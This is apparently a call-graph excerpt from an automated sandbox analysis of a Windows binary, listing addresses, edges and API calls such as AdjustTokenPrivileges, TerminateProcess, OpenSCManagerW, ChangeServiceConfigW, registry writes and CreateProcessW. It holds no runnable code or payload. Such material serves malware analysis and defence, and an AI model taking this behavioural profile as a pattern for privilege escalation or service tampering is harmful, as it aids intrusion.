43e804 22690->22691 22692 43e818 22691->22692 22693 43b1a8 26 API calls 22691->22693 22692->22144 22693->22692 22695 406bd8 22694->22695 22696 43bf27 GetCurrentProcess OpenProcessToken 22695->22696 22697 43bf97 22696->22697 22698 43bf4c GetLastError 22696->22698 22701 43bfa3 LookupPrivilegeValueW 22697->22701 23629 40f220 15 API calls 22698->23629 22700 43bf66 23630 407184 15 API calls 22700->23630 22703 43bffa AdjustTokenPrivileges 22701->22703 22704 43bfaf GetLastError 22701->22704 22707 43c031 GetLastError 22703->22707 22716 43bf92 22703->22716 23631 40f220 15 API calls 22704->23631 23633 40f220 15 API calls 22707->23633 22708 43bfc9 23632 407184 15 API calls 22708->23632 22713 43c04b 23634 407184 15 API calls 22713->23634 22716->22151 22732 43c216 TerminateProcess 22731->22732 22733 43c1da GetLastError 22731->22733 22734 43c222 CloseHandle GetLastError 22732->22734 22735 43c264 CloseHandle 22732->22735 22736 407450 15 API calls 22733->22736 22737 407450 15 API calls 22734->22737 22735->22153 22738 43c1f6 22736->22738 22739 43c244 22737->22739 22740 407dec 14 API calls 22738->22740 22741 407dec 14 API calls 22739->22741 22742 43c1fb 22740->22742 22744 43c249 22741->22744 22743 407450 15 API calls 22742->22743 22745 43c205 22743->22745 22746 407450 15 API calls 22744->22746 22747 404cdc 14 API calls 22745->22747 22748 43c253 22746->22748 22749 43c20a 22747->22749 22750 404cdc 14 API calls 22748->22750 22752 4042f8 14 API calls 22749->22752 22751 43c258 22750->22751 22753 4042f8 14 API calls 22751->22753 22754 43c20f 22752->22754 22755 43c25d 22753->22755 23635 40632c 10 API calls 22754->23635 23636 40632c 10 API calls 22755->23636 22759 43b59e 22758->22759 22760 407450 15 API calls 22759->22760 22761 43b5c5 22760->22761 22762 407450 15 API calls 22761->22762 22763 43b5cd 22762->22763 22764 407450 15 API calls 22763->22764 22765 43b5d7 22764->22765 22766 404cdc 14 API calls 22765->22766 22767 43b5dc 22766->22767 22768 4042f8 14 API calls 22767->22768 22769 43b5e1 OpenSCManagerW 22768->22769 22770 43b5f8 GetLastError 22769->22770 22772 43b610 22769->22772 23637 43b48c 17 API calls 22770->23637 22773 43b61a OpenServiceW 22772->22773 22774 43b642 StartServiceW 22773->22774 22775 43b62d GetLastError 22773->22775 22777 43b6a6 CloseServiceHandle CloseServiceHandle 22774->22777 22778 43b65a GetLastError 22774->22778 23638 43b48c 17 API calls 22775->23638 22779 43b60a 22777->22779 22781 43b696 22778->22781 22782 43b669 Sleep StartServiceW 22778->22782 22779->22156 22780 43b63f 22780->22779 23640 43b48c 17 API calls 22781->23640 22782->22777 22783 43b686 22782->22783 23639 43b48c 17 API calls 22783->23639 22787 43e879 22786->22787 22788 43e88f 22786->22788 23649 4387ec 18 API calls 22787->23649 23650 4387a8 18 API calls 22788->23650 22791 43e88a 22792 438890 18 API calls 22791->22792 22793 43e8ab 22792->22793 22794 4389d8 19 API calls 22793->22794 22795 43e8ba 22794->22795 22796 43e8fa 22795->22796 22797 43e8be GetLastError 22795->22797 23641 4396b8 22796->23641 22799 407450 15 API calls 22797->22799 22801 43e8da 22799->22801 22802 407dec 14 API calls 22801->22802 22804 43e8df 22802->22804 22803 438860 17 API calls 22805 43e95b 22803->22805 22806 407450 15 API calls 22804->22806 22808 43ed53 22805->22808 22809 4389d8 19 API calls 22805->22809 22807 43e8e9 22806->22807 22810 404cdc 14 API calls 22807->22810 22808->22166 22811 43e974 22809->22811 22812 43e8ee 22810->22812 22813 43e9b4 22811->22813 22814 43e978 GetLastError 22811->22814 22815 4042f8 14 API calls 22812->22815 22816 4396b8 70 API calls 22813->22816 22817 407450 15 API calls 22814->22817 22818 43e8f3 22815->22818 22819 43e9d1 22816->22819 22820 43e994 22817->22820 23651 40632c 10 API calls 22818->23651 22823 438860 17 API calls 22819->22823 22822 407dec 14 API calls 22820->22822 22824 43e999 22822->22824 22825 43ea10 22823->22825 22826 407450 15 API calls 22824->22826 22827 4389d8 19 API calls 22825->22827 22828 43e9a3 22826->22828 22830 43ea1f 22827->22830 22829 404cdc 14 API calls 22828->22829 22831 43e9a8 22829->22831 22832 43ea23 GetLastError 22830->22832 22833 43ea5f 22830->22833 22834 4042f8 14 API calls 22831->22834 22836 407450 15 API calls 22832->22836 22835 4396b8 70 API calls 22833->22835 22837 43e9ad 22834->22837 22838 43ea7c 22835->22838 22839 43ea3f 22836->22839 23652 40632c 10 API calls 22837->23652 22843 438860 17 API calls 22838->22843 22840 407dec 14 API calls 22839->22840 22842 43ea44 22840->22842 22844 407450 15 API calls 22842->22844 22845 43eabb 22843->22845 22846 43ea4e 22844->22846 23644 439d1c 22845->23644 22849 404cdc 14 API calls 22846->22849 22850 43ea53 22849->22850 22852 4042f8 14 API calls 22850->22852 22851 4389d8 19 API calls 22853 43eadf 22851->22853 22854 43ea58 22852->22854 22855 43eae3 GetLastError 22853->22855 22856 43eb1f 22853->22856 23653 40632c 10 API calls 22854->23653 22859 407450 15 API calls 22855->22859 22932 43f314 22931->22932 22933 43f31f 22931->22933 23673 43c31c 22932->23673 22935 43c31c 21 API calls 22933->22935 22937 43f329 22935->22937 22936 43f31e 22936->22174 22937->22174 22939 43cebb 22938->22939 22940 42f9fc 73 API calls 22939->22940 22941 43cee1 22940->22941 22941->21811 22942->21872 22943->21867 22944->21892 22945->21986 22946->22073 22947->22085 22948->21918 22949->21912 22951 405fd0 22950->22951 22954 405f2c 22951->22954 22955 405f74 22954->22955 22956 405f3c 22954->22956 22955->22187 22956->22955 22958 4430dc 22956->22958 22959 4430f6 22958->22959 22960 44314c 22958->22960 22974 406098 22959->22974 22960->22956 22962 443122 22980 409610 22962->22980 22963 443100 22963->22962 22964 406bf0 15 API calls 22963->22964 22964->22962 22968 443136 22985 415b40 GetModuleHandleW 22968->22985 22971 408f6c 37 API calls 22972 443147 22971->22972 22990 415198 82 API calls 22972->22990 22976 4060a4 22974->22976 22979 4060d5 22976->22979 22991 405fe0 69 API calls 22976->22991 22992 406034 69 API calls 22976->22992 22993 406084 69 API calls 22976->22993 22979->22963 22981 4041b0 14 API calls 22980->22981 22982 40961d 22981->22982 22983 414698 GetVersionExW 22982->22983 22984 4146af 22983->22984 22984->22968 22986 415b61 22985->22986 22987 415b51 22985->22987 22986->22971 22994 40aa94 17 API calls 22987->22994 22989 415b5c 22989->22986 22990->22960 22991->22976 22992->22976 22993->22976 22994->22989 22996 406847 22995->22996 23006 404c3c 22996->23006 22998 406852 23018 4067c8 22998->23018 23001 406344 14 API calls 23002 406884 23001->23002 23003 4068c4 23002->23003 23004 4068d8 23003->23004 23005 4068ca SysFreeString 23003->23005 23004->22193 23005->23004 23007 404c3e 23006->23007 23010 404be8 23007->23010 23014 404c69 23007->23014 23028 404be8 23007->23028 23035 40a264 14 API calls 23007->23035 23008 404cb4 23008->22998 23010->23008 23015 404bfc 23010->23015 23026 404ba4 14 API calls 23010->23026 23012 404c33 23012->22998 23014->22998 23015->23012 23027 404318 14 API calls 23015->23027 23017 404c2e 23017->22998 23019 4067d4 23018->23019 23020 404c3c 14 API calls 23019->23020 23021 4067df 23020->23021 23022 404be8 14 API calls 23021->23022 23023 406816 23022->23023 23024 406344 14 API calls 23023->23024 23025 40681f 23024->23025 23025->23001 23026->23015 23027->23017 23029 404bf4 23028->23029 23032 404bfc 23028->23032 23036 404ba4 14 API calls 23029->23036 23031 404c33 23031->23007 23032->23031 23037 404318 14 API calls 23032->23037 23034 404c2e 23034->23007 23035->23007 23036->23032 23037->23034 23041 4048dc 23038->23041 23042 4048e8 23041->23042 23043 40491d 23042->23043 23045 404318 14 API calls 23042->23045 23043->22201 23045->23043 23046->22205 23047->22208 23048->22204 23051 404450 23049->23051 23050 406f48 15 API calls 23052 4044b7 23050->23052 23051->23050 23052->22212 23054 407504 14 API calls 23053->23054 23055 406d3c 23054->23055 23056 406344 14 API calls 23055->23056 23057 40459a 23056->23057 23057->22222 23058->22227 23059->22232 23061 4388b7 23060->23061 23062 43889d 23060->23062 23066 438b0c 23061->23066 23063 4388a3 RegCloseKey 23062->23063 23064 4388ad 23062->23064 23063->23064 23065 438860 17 API calls 23064->23065 23065->23061 23067 438b36 23066->23067 23135 406c44 23066->23135 23131 43858c 23067->23131 23070 438b3e 23072 438b56 23070->23072 23139 4073dc 15 API calls 23070->23139 23073 438b84 RegOpenKeyExW 23072->23073 23074 438b93 23073->23074 23075 438b9c 23074->23075 23079 438bda 23074->23079 23076 438bc8 23075->23076 23140 407184 15 API calls 23075->23140 23141 4388bc 17 API calls 23076->23141 23080 438bfa RegOpenKeyExW 23079->23080 23081 438c09 23080->23081 23083 438c12 23081->23083 23087 438c4d 23081->23087 23082 438bd5 23082->22244 23084 438c3e 23083->23084 23142 407184 15 API calls 23083->23142 23143 4388bc 17 API calls 23084->23143 23088 438c6b RegOpenKeyExW 23087->23088 23089 438c7a 23088->23089 23089->23082 23090 438cac 23089->23090 23144 407184 15 API calls 23089->23144 23090->23082 23145 4388bc 17 API calls 23090->23145 23148 4392a0 23093->23148 23096 439422 23099 406d2c 14 API calls 23096->23099 23097 439478 23098 406bf0 15 API calls 23097->23098 23107 43946d 23098->23107 23100 439434 23099->23100 23151 4398f0 23100->23151 23102 43944c 23103 43946f 23102->23103 23105 439458 23102->23105 23159 438560 69 API calls 23103->23159 23106 406f48 15 API calls 23105->23106 23106->23107 23108 438860 23107->23108 23109 43886a 23108->23109 23110 43888e 23108->23110 23111 438870 RegFlushKey 23109->23111 23112 438876 RegCloseKey 23109->23112 23114 40e50c 23110->23114 23111->23112 23113 406bf0 15 API calls 23112->23113 23113->23110 23115 40e518 23114->23115 23116 40e53b 23115->23116 23117 40e52c 23115->23117 23119 406f48 15 API calls 23116->23119 23166 40e4bc 15 API calls 23117->23166 23120 40e539 23119->23120 23120->22259 23121->22240 23122->22240 23124 407dc4 23123->23124 23167 404cb8 23124->23167 23127->22245 23128->22258 23129->22267 23130->22292 23132 43859c 23131->23132 23134 4385cd 23132->23134 23146 4064f4 15 API calls 23132->23146 23134->23070 23137 406c48 23135->23137 23136 406c78 23136->23067 23137->23136 23147 4041cc 14 API calls 23137->23147 23139->23072 23141->23082 23143->23082 23145->23082 23146->23134 23147->23136 23160 43924c 23148->23160 23150 4392b4 23150->23096 23150->23097 23152 406c7c 23151->23152 23153 439916 RegQueryValueExW 23152->23153 23155 439929 23153->23155 23154 439951 23154->23102 23155->23154 23164 413794 69 API calls 23155->23164 23157 43994c 23165 405c30 14 API calls 23157->23165 23159->23107 23161 439264 23160->23161 23162 439278 RegQueryValueExW 23161->23162 23163 43928b 23162->23163 23163->23150 23164->23157 23166->23120 23168 404c3c 14 API calls 23167->23168 23169 404ccc 23168->23169 23170 404be8 14 API calls 23169->23170 23171 404cd9 23170->23171 23171->22256 23172->22333 23174 43c47b 23173->23174 23175 406bf0 15 API calls 23174->23175 23176 43c492 23175->23176 23177 43c4dc 23176->23177 23194 415584 16 API calls 23176->23194 23180 43c4f0 ExpandEnvironmentStringsW 23177->23180 23179 43c4ce 23181 406c44 14 API calls 23179->23181 23182 43c4fa 23180->23182 23181->23177 23182->22336 23184 406c7c 23183->23184 23185 43dc79 LoadLibraryExW 23184->23185 23186 43dc85 FindResourceW 23185->23186 23187 43dcfc 23185->23187 23186->23187 23188 43dc95 LoadResource 23186->23188 23190 40fed8 23187->23190 23188->23187 23189 43dca0 FreeLibrary 23188->23189 23189->23187 23195 40feec 23190->23195 23192 40fee7 23192->22341 23194->23179 23196 40fef5 23195->23196 23197 40ff49 23196->23197 23213 4064f4 15 API calls 23196->23213 23199 40ffa0 23197->23199 23200 40ff59 23197->23200 23203 40ff76 23199->23203 23215 4064f4 15 API calls 23199->23215 23200->23203 23214 4064f4 15 API calls 23200->23214 23204 41004b 23203->23204 23211 40ffd3 23203->23211 23205 406d2c 14 API calls 23204->23205 23209 410049 23205->23209 23206 41003e 23207 406f48 15 API calls 23206->23207 23207->23209 23208 406bf0 15 API calls 23208->23211 23209->23192 23210 406f48 15 API calls 23210->23211 23211->23206 23211->23208 23211->23210 23216 4064f4 15 API calls 23211->23216 23213->23197 23214->23203 23215->23203 23216->23211 23276 40819c 23217->23276 23221 43b1bc 23220->23221 23222 407450 15 API calls 23221->23222 23223 43b1d9 23222->23223 23224 407450 15 API calls 23223->23224 23225 43b1e1 23224->23225 23226 407450 15 API calls 23225->23226 23227 43b1eb 23226->23227 23228 404cdc 14 API calls 23227->23228 23229 43b1f0 23228->23229 23230 4042f8 14 API calls 23229->23230 23231 43b1f5 OpenSCManagerW 23230->23231 23232 43b243 23231->23232 23233 43b209 GetLastError 23231->23233 23235 43b24d OpenServiceW 23232->23235 23234 407450 15 API calls 23233->23234 23236 43b225 23234->23236 23237 43b297 ChangeServiceConfigW 23235->23237 23238 43b25a CloseServiceHandle GetLastError 23235->23238 23239 407dec 14 API calls 23236->23239 23240 43b2f7 CloseServiceHandle CloseServiceHandle 23237->23240 23241 43b2b4 CloseServiceHandle CloseServiceHandle GetLastError 23237->23241 23242 407450 15 API calls 23238->23242 23243 43b22a 23239->23243 23245 43b23e 23240->23245 23246 407450 15 API calls 23241->23246 23247 43b27c 23242->23247 23244 407450 15 API calls 23243->23244 23248 43b234 23244->23248 23245->22438 23249 43b2dc 23246->23249 23250 407dec 14 API calls 23247->23250 23251 404cdc 14 API calls 23248->23251 23252 407dec 14 API calls 23249->23252 23253 43b281 23250->23253 23254 43b239 23251->23254 23255 43b2e1 23252->23255 23256 407450 15 API calls 23253->23256 23257 4042f8 14 API calls 23254->23257 23258 407450 15 API calls 23255->23258 23259 43b28b 23256->23259 23257->23245 23261 43b2eb 23258->23261 23260 404cdc 14 API calls 23259->23260 23262 43b290 23260->23262 23263 404cdc 14 API calls 23261->23263 23264 4042f8 14 API calls 23262->23264 23265 43b2f0 23263->23265 23266 43b295 23264->23266 23267 4042f8 14 API calls 23265->23267 23266->23245 23267->23266 23269 408346 23268->23269 23273 408378 23268->23273 23270 408370 23269->23270 23269->23273 23301 40789c 23269->23301 23326 4041cc 14 API calls 23270->23326 23273->22100 23274->22442 23277 4081bb 23276->23277 23281 4081d5 23276->23281 23278 4081c6 23277->23278 23295 4042a0 14 API calls 23277->23295 23296 408194 16 API calls 23278->23296 23283 40821e 23281->23283 23297 4042a0 14 API calls 23281->23297 23282 4081d0 23282->22438 23285 40822f 23283->23285 23298 4042a0 14 API calls 23283->23298 23287 408238 23285->23287 23288 40826d 23285->23288 23299 4041e4 14 API calls 23287->23299 23289 4041b0 14 API calls 23288->23289 23291 408277 23289->23291 23292 408268 23291->23292 23300 40817c 20 API calls 23291->23300 23292->23282 23294 40819c 20 API calls 23292->23294 23294->23292 23295->23278 23296->23282 23297->23283 23298->23285 23299->23292 23300->23292 23302 4078a5 23301->23302 23305 4078e2 23301->23305 23303 4078e7 23302->23303 23304 4078ba 23302->23304 23306 4078f8 23303->23306 23307 4078ee 23303->23307 23304->23305 23308 4078c2 23304->23308 23309 407904 23304->23309 23305->23270 23327 406368 14 API calls 23306->23327 23310 406344 14 API calls 23307->23310 23314 4078c6 23308->23314 23315 407938 23308->23315 23312 407915 23309->23312 23313 40790b 23309->23313 23310->23305 23328 4068dc SysFreeString 23312->23328 23316 4068c4 SysFreeString 23313->23316 23318 407947 23314->23318 23319 4078ca 23314->23319 23315->23305 23329 407884 14 API calls 23315->23329 23316->23305 23318->23305 23322 40789c 16 API calls 23318->23322 23321 407965 23319->23321 23325 4078d2 23319->23325 23321->23305 23330 40784c 16 API calls 23321->23330 23322->23318 23324 408340 16 API calls 23324->23325 23325->23305 23325->23324 23326->23273 23327->23305 23328->23305 23329->23315 23330->23321 23415 40f8fc 23331->23415 23333 40f9eb 23421 40730c 23333->23421 23335 40f9fc 23336 40f7c4 23335->23336 23337 406c7c 23336->23337 23338 40f7ce GetFileAttributesW 23337->23338 23339 40f7d9 23338->23339 23339->22510 23339->22623 23341 40f7fd 23340->23341 23342 40f835 23341->23342 23443 4136c4 69 API calls 23341->23443 23433 414f3c 23342->23433 23346 40f825 23444 405c30 14 API calls 23346->23444 23347 406c44 14 API calls 23349 40f84b 23347->23349 23350 40f868 23349->23350 23445 4064f4 15 API calls 23349->23445 23352 40f876 23350->23352 23353 40f7c4 GetFileAttributesW 23350->23353 23354 40f886 23352->23354 23355 40f9d8 15 API calls 23352->23355 23353->23352 23358 40f9d8 15 API calls 23354->23358 23360 40f8c6 23354->23360 23356 40f895 23355->23356 23357 4072a4 15 API calls 23356->23357 23357->23354 23359 40f8b2 23358->23359 23361 40f7e8 71 API calls 23359->23361 23360->22531 23362 40f8ba 23361->23362 23362->23360 23440 40fb5c 23362->23440 23365 406bf0 23364->23365 23366 40716f 23364->23366 23365->23364 23367 4070b0 23365->23367 23369 406c00 23365->23369 23371 406c10 23365->23371 23367->23366 23370 406bf0 15 API calls 23367->23370 23374 4070c3 23367->23374 23368 406c40 23368->22540 23369->23371 23373 407504 14 API calls 23369->23373 23370->23374 23371->23368 23457 4041cc 14 API calls 23371->23457 23372 40710c 23372->23366 23378 407504 14 API calls 23372->23378 23373->23371 23377 4070ee 23374->23377 23458 406504 15 API calls 23374->23458 23377->23372 23459 406504 15 API calls 23377->23459 23380 407122 23378->23380 23382 40715a 23380->23382 23460 406368 14 API calls 23380->23460 23383 406bf0 15 API calls 23382->23383 23384 40716b 23383->23384 23384->22540 23386 406c7c 23385->23386 23387 40f787 GetFileAttributesW 23386->23387 23388 40f792 23387->23388 23389 40f79a GetLastError 23387->23389 23388->22552 23390 40f7a6 23389->23390 23391 40f7bb 23389->23391 23390->23391 23392 40f7b0 23390->23392 23391->22552 23461 40f73c FindFirstFileW FindClose 23392->23461 23394 40f7b7 23394->23391 23396 43cc63 23395->23396 23462 42f9fc 23396->23462 23398 43cc91 23466 42f7b0 23398->23466 23400 43ccad 23401 407450 15 API calls 23400->23401 23402 43cd49 23401->23402 23403 407450 15 API calls 23402->23403 23404 43cd51 23403->23404 23405 407450 15 API calls 23404->23405 23406 43cd5b 23405->23406 23407 407450 15 API calls 23406->23407 23408 43cd63 23407->23408 23409 404cdc 14 API calls 23408->23409 23410 43cd68 23409->23410 23411 4042f8 14 API calls 23410->23411 23412 43cd6d 23411->23412 23412->22513 23413->22623 23414->22556 23416 40f912 23415->23416 23419 40f93d 23416->23419 23430 4064f4 15 API calls 23416->23430 23418 40f9b2 23418->23333 23419->23418 23420 4064f4 15 API calls 23419->23420 23420->23419 23422 407322 23421->23422 23424 40734d 23422->23424 23431 4064f4 15 API calls 23422->23431 23425 407395 23424->23425 23426 4073a8 23424->23426 23427 406d2c 14 API calls 23425->23427 23432 406d1c 15 API calls 23426->23432 23429 4073a6 23427->23429 23429->23335 23430->23419 23431->23424 23432->23429 23434 406bf0 15 API calls 23433->23434 23435 414f4c 23434->23435 23446 414e7c 23435->23446 23437 414f66 23438 40f840 23437->23438 23439 406f48 15 API calls 23437->23439 23438->23347 23439->23438 23441 406c7c 23440->23441 23442 40fb68 CreateDirectoryW 23441->23442 23442->23360 23443->23346 23445->23350 23447 414e8e 23446->23447 23450 414ebd 23447->23450 23454 4064f4 15 API calls 23447->23454 23448 414ef0 23453 414f0b 23448->23453 23456 414728 15 API calls 23448->23456 23450->23448 23455 4064f4 15 API calls 23450->23455 23453->23437 23454->23450 23455->23448 23456->23453 23457->23368 23458->23377 23459->23372 23460->23382 23461->23394 23463 42fa06 23462->23463 23471 42fb48 FindResourceW 23463->23471 23465 42fa36 23465->23398 23483 42f548 23466->23483 23468 42f7ca 23487 42f798 69 API calls 23468->23487 23470 42f7e5 23470->23400 23472 42fb74 LoadResource 23471->23472 23473 42fb6d 23471->23473 23474 42fb87 23472->23474 23475 42fb8e SizeofResource LockResource 23472->23475 23481 42faa8 69 API calls 23473->23481 23482 42faa8 69 API calls 23474->23482 23478 42fbac 23475->23478 23478->23465 23479 42fb73 23479->23472 23480 42fb8d 23480->23475 23481->23479 23482->23480 23484 42f551 23483->23484 23488 42f58c 23484->23488 23486 42f56d 23486->23468 23487->23470 23489 42f5a7 23488->23489 23490 42f5d3 23489->23490 23491 42f64f 23489->23491 23513 40f650 23490->23513 23521 40f5f8 CreateFileW 23491->23521 23494 42f659 23512 42f64d 23494->23512 23522 40fa54 17 API calls 23494->23522 23496 42f5f0 23496->23512 23517 40fa54 17 API calls 23496->23517 23497 406bf0 15 API calls 23500 42f6bc 23497->23500 23498 42f674 GetLastError 23523 412bfc 15 API calls 23498->23523 23500->23486 23502 42f60f GetLastError 23518 412bfc 15 API calls 23502->23518 23503 42f68b 23524 413794 69 API calls 23503->23524 23506 42f626 23519 413794 69 API calls 23506->23519 23507 42f6ad 23525 405c30 14 API calls 23507->23525 23510 42f648 23520 405c30 14 API calls 23510->23520 23512->23497 23514 40f667 23513->23514 23515 40f68f 23513->23515 23516 40f689 CreateFileW 23514->23516 23515->23496 23516->23515 23517->23502 23518->23506 23519->23510 23521->23494 23522->23498 23523->23503 23524->23507 23527 406c44 14 API calls 23526->23527 23528 438a04 23527->23528 23529 43858c 15 API calls 23528->23529 23530 438a0c 23529->23530 23531 438a24 23530->23531 23552 4073dc 15 API calls 23530->23552 23533 438a35 23531->23533 23535 438a65 23531->23535 23534 438a51 RegOpenKeyExW 23533->23534 23538 438a60 23534->23538 23536 438a8b RegCreateKeyExW 23535->23536 23536->23538 23537 438ad3 23537->22661 23538->23537 23539 438ac6 23538->23539 23553 407184 15 API calls 23538->23553 23554 4388bc 17 API calls 23539->23554 23543 439392 23542->23543 23544 4393bd 23543->23544 23563 4064f4 15 API calls 23543->23563 23555 43987c 23544->23555 23547 4393e3 23547->22670 23548->22657 23549->22657 23550->22663 23552->23531 23554->23537 23556 439895 23555->23556 23557 4398a9 RegSetValueExW 23556->23557 23558 4398bc 23557->23558 23559 4398e4 23558->23559 23564 413794 69 API calls 23558->23564 23559->23547 23561 4398df 23565 405c30 14 API calls 23561->23565 23563->23544 23564->23561 23567 43ae3c 23566->23567 23568 407450 15 API calls 23567->23568 23569 43ae60 23568->23569 23570 407450 15 API calls 23569->23570 23571 43ae68 23570->23571 23572 407450 15 API calls 23571->23572 23573 43ae72 23572->23573 23574 404cdc 14 API calls 23573->23574 23575 43ae77 23574->23575 23576 4042f8 14 API calls 23575->23576 23577 43ae7c OpenSCManagerW 23576->23577 23578 43ae90 GetLastError 23577->23578 23579 43aeca 23577->23579 23580 407450 15 API calls 23578->23580 23582 43aed4 OpenServiceW 23579->23582 23581 43aeac 23580->23581 23585 407dec 14 API calls 23581->23585 23583 43af21 QueryServiceConfigW 23582->23583 23584 43aee1 CloseServiceHandle GetLastError 23582->23584 23588 43af33 23583->23588 23589 43af51 23583->23589 23586 407450 15 API calls 23584->23586 23587 43aeb1 23585->23587 23590 43af03 23586->23590 23592 407450 15 API calls 23587->23592 23593 407450 15 API calls 23588->23593 23591 4041b0 14 API calls 23589->23591 23594 407dec 14 API calls 23590->23594 23595 43af5b QueryServiceConfigW 23591->23595 23596 43aebb 23592->23596 23597 43af42 23593->23597 23598 43af08 23594->23598 23599 43af71 23595->23599 23600 43afbe 23595->23600 23601 404cdc 14 API calls 23596->23601 23602 404cdc 14 API calls 23597->23602 23605 407450 15 API calls 23598->23605 23627 4041cc 14 API calls 23599->23627 23628 4041cc 14 API calls 23600->23628 23607 43aec0 23601->23607 23603 43af47 23602->23603 23608 4042f8 14 API calls 23603->23608 23610 43af12 23605->23610 23612 4042f8 14 API calls 23607->23612 23613 43af1c 23608->23613 23609 43afd1 CloseServiceHandle CloseServiceHandle 23614 43aec5 23609->23614 23615 404cdc 14 API calls 23610->23615 23611 43af7b CloseServiceHandle CloseServiceHandle GetLastError 23616 407450 15 API calls 23611->23616 23612->23614 23613->23614 23614->22687 23617 43af17 23615->23617 23618 43afa3 23616->23618 23619 4042f8 14 API calls 23617->23619 23620 407dec 14 API calls 23618->23620 23619->23613 23621 43afa8 23620->23621 23622 407450 15 API calls 23621->23622 23623 43afb2 23622->23623 23624 404cdc 14 API calls 23623->23624 23625 43afb7 23624->23625 23626 4042f8 14 API calls 23625->23626 23626->23613 23627->23611 23628->23609 23629->22700 23631->22708 23633->22713 23635->22732 23636->22735 23637->22779 23638->22780 23639->22780 23640->22780 23642 439674 70 API calls 23641->23642 23643 4396c0 23642->23643 23643->22803 23663 4399a0 23644->23663 23646 439d58 23647 439d64 23646->23647 23648 439d5e RegCloseKey 23646->23648 23647->22808 23647->22851 23648->23647 23649->22791 23650->22791 23651->22796 23652->22813 23653->22833 23664 406c44 14 API calls 23663->23664 23665 4399c9 23664->23665 23666 43858c 15 API calls 23665->23666 23667 4399d1 23666->23667 23669 4399e9 23667->23669 23672 4073dc 15 API calls 23667->23672 23670 439a0a RegOpenKeyExW 23669->23670 23671 439a25 23670->23671 23671->23646 23672->23669 23674 43c32e 23673->23674 23690 4074fc 23674->23690 23676 43c35c 23677 43c378 CreateProcessW 23676->23677 23678 43c3b7 CloseHandle WaitForSingleObject CloseHandle 23677->23678 23679 43c384 GetLastError 23677->23679 23682 43c3b5 23678->23682 23680 407450 15 API calls 23679->23680 23681 43c39c 23680->23681 23683 407dec 14 API calls 23681->23683 23682->22936 23684 43c3a1 23683->23684 23685 407450 15 API calls 23684->23685 23686 43c3ab 23685->23686 23687 404cdc 14 API calls 23686->23687 23688 43c3b0 23687->23688 23689 4042f8 14 API calls 23688->23689 23689->23682 23691 4074a8 23690->23691 23692 4074f5 23691->23692 23693 4074bb 23691->23693 23698 4064ec 15 API calls 23691->23698 23692->23676 23693->23692 23695 407504 14 API calls 23693->23695 23696 4074cf 23695->23696 23696->23692 23699 4041cc 14 API calls 23696->23699 23698->23693 23699->23692 23700 42da28 23701 42da56 23700->23701 23702 408334 20 API calls 23701->23702 23703 42da89 23702->23703 23710 416308 23703->23710 23705 42daa3 23731 416e30 23705->23731 23708 42dacc 23709 402990 VirtualAlloc 23709->23708 23711 416332 23710->23711 23721 416352 23710->23721 23738 416ea0 InterlockedCompareExchange 23711->23738 23713 40789c 16 API calls 23715 4163fd 23713->23715 23714 416337 23716 416356 23714->23716 23717 41634d 23714->23717 23715->23705 23740 416270 InterlockedCompareExchange 23716->23740 23739 416ea0 InterlockedCompareExchange 23717->23739 23720 41635b 23722 416371 23720->23722 23723 41637a 23720->23723 23721->23713 23741 416270 InterlockedCompareExchange 23722->23741 23742 416edc 71 API calls 23723->23742 23726 41637f 23727 416395 23726->23727 23728 41639e 23726->23728 23743 416edc 71 API calls 23727->23743 23744 416dbc 71 API calls 23728->23744 23745 416b68 23731->23745 23733 416e5f 23734 406d2c 14 API calls 23733->23734 23735 416e74 23734->23735 23736 408340 16 API calls 23735->23736 23737 416e8f 23736->23737 23737->23709 23738->23714 23739->23721 23740->23720 23741->23721 23742->23726 23743->23721 23744->23721 23746 416b9a 23745->23746 23747 416b7f 23745->23747 23748 416bc2 23746->23748 23787 413794 69 API calls 23746->23787 23747->23746 23785 4136c4 69 API calls 23747->23785 23754 416bea 23748->23754 23789 413794 69 API calls 23748->23789 23751 416b95 23786 405c30 14 API calls 23751->23786 23752 416bbd 23788 405c30 14 API calls 23752->23788 23758 416c1b 23754->23758 23791 413794 69 API calls 23754->23791 23757 416be5 23790 405c30 14 API calls 23757->23790 23767 416a78 23758->23767 23762 416c16 23792 405c30 14 API calls 23762->23792 23765 408334 20 API calls 23766 416c42 23765->23766 23766->23733 23768 416aaa 23767->23768 23769 416a8f 23767->23769 23770 416ad2 23768->23770 23795 413794 69 API calls 23768->23795 23769->23768 23793 4136c4 69 API calls 23769->23793 23776 416afa 23770->23776 23797 413794 69 API calls 23770->23797 23773 416aa5 23794 405c30 14 API calls 23773->23794 23774 416acd 23796 405c30 14 API calls 23774->23796 23781 416b2b 23776->23781 23799 413794 69 API calls 23776->23799 23779 416af5 23798 405c30 14 API calls 23779->23798 23781->23765 23783 416b26 23800 405c30 14 API calls 23783->23800 23785->23751 23787->23752 23789->23757 23791->23762 23793->23773 23795->23774 23797->23779 23799->23783 23801 40472c 23802 404742 23801->23802 23803 404748 23802->23803 23804 4047a5 CreateFileW 23802->23804 23805 404857 GetStdHandle 23802->23805 23806 4047c3 23804->23806 23807 4048cb GetLastError 23804->23807 23805->23807 23810 404892 23805->23810 23809 4047d1 GetFileSize 23806->23809 23806->23810 23807->23803 23809->23807 23811 4047e5 SetFilePointer 23809->23811 23810->23803 23812 40489c GetFileType 23810->23812 23811->23807 23815 404801 ReadFile 23811->23815 23812->23803 23814 4048b7 CloseHandle 23812->23814 23814->23803 23815->23807 23816 404823 23815->23816 23816->23810 23817 404836 SetFilePointer 23816->23817 23817->23807 23818 40484b SetEndOfFile 23817->23818 23818->23807 23819 404855 23818->23819 23819->23810

                                                                                                              Executed Functions

                                                                                                              Function 0043B7D4 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 336serviceCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
